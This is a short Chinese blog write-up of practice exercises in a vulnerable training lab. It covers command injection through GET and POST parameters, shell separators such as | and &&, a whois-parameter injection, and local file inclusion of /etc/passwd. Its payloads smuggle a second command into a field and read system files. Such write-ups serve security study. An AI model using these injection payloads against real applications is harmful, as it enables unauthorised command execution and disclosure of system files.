LFI Labs

CMD-1

以 ?cmd= 的 GET方式传递

?cmd=whoami

得到
image

CMD-2

以 POST的方式传递 cmd 参数
payload同CMD-1

CMD-3

image
利用

cmd1|cmd2:不论cmd1是否为真,cmd2都会被执行;
cmd1;cmd2:不论cmd1是否为真,cmd2都会被执行;
cmd1||cmd2:如果cmd1为假,则执行cmd2;
cmd1&&cmd2:如果cmd1为真,则执行cmd2;

构造payload:

?domain=hack.com|whoami

CMD-4

以POST请求的方式上传参数
payload同 CMD-3

CMD-5

尝试了几种都似乎被过滤掉了
利用 域名查询语句

whois -h [server] [domain]

如下%构造payload

domain=www.baidu.com&&server=whois.publicinterestregistry.net|whoami ||

这样拼接后的域名查询语句就是:

whois -h= whois.publicinterestregistry.net|whoami || www.baidu.con

结合前面的知识 会执行 whoami 忽略掉 www.baidu.com

CMD-6

5的POST版本

HDR-1

日后补

LFI-1

没有过滤的本地文件包含漏洞
payload:

Linux: /etc/passwd

image

posted @ 2023-08-31 16:08  N0zoM1z0  阅读(81)  评论(0编辑  收藏  举报